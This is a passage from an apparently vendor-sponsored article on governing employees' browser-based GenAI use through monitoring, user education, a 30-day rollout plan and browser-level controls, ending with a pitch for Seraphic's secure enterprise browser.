Ultimately, a working GenAI security program relies on accurate visibility into how employees are using browser-based GenAI tools. Tacking which domains and apps are accessed, the contents being entered into prompts, and how often policies trigger warnings or blocks are all necessary. Aggregating this telemetry into existing logging and SIEM infrastructure allows security teams to identify patterns, outliers, and incidents.

Analytics built on this data can help highlight genuine risk. For example, enterprises can make a clear determination between non‑sensitive vs proprietary source code being entered into prompts. Using this information, SOC teams can refine rules, adjust isolation levels, and target training where it will provide the greatest impact.

Change management and user education

CISOs with successful GenAI security programs invest in the time to explain the “why” behind restrictions. By sharing concrete scenarios that resonate with different roles, you can reduce the chances of your program failing – developers need examples related to IP, while sales and support staff benefit from stories about customer trust and contract details. Sharing scenario‑based content with relevant parties will reinforce good habits in the right moments.

When employees understand that guardrails are designed to preserve their ability to use GenAI at scale, not hinder them, they are more likely to follow the guidelines. Aligning communications with broader AI governance initiatives helps position browser‑level controls as part of a cohesive strategy rather than an isolated one.

A practical 30‑day rollout approach

Many organizations are looking for a pragmatic path to move from ad‑hoc browser-based GenAI usage to a structured, policy‑driven model.

One effective way of doing so is utilizing a Secure Enterprise Browsing (SEB) platform that can provide you with the visibility and reach needed. With the right SEB you can map the current GenAI tools used within your enterprise, so you can create policy decisions like monitoring‑only or warn‑and‑educate modes for clearly risky behaviors. Over the following weeks, enforcement can be expanded to more users and higher‑risk data types, FAQs, and training.

By the end of a 30‑day period, many organizations can formalize their GenAI browser policy, integrate alerts into SOC workflows, and establish a cadence for adjusting controls as usage evolves.

Turning the browser into the GenAI control plane

As GenAI continues to spread across SaaS apps and web pages, the browser remains the central interface through which most employees access them. The best GenAI protections simply cannot be worked into legacy perimeter controls. Enterprises can achieve the best results by treating the browser as the primary control plane. This approach enables security teams with meaningful ways to reduce data leakage and compliance risk while simultaneously preserving the productivity benefits that make GenAI so powerful.

With well‑designed policies, measured isolation strategies, and browser‑native data protections, CISOs can move from reactive blocking to confident, large‑scale enablement of GenAI across their entire workforce.

To learn more about Secure Enterprise Browsers (SEB) and how they can secure GenAI use at your organization, speak to a Seraphic expert.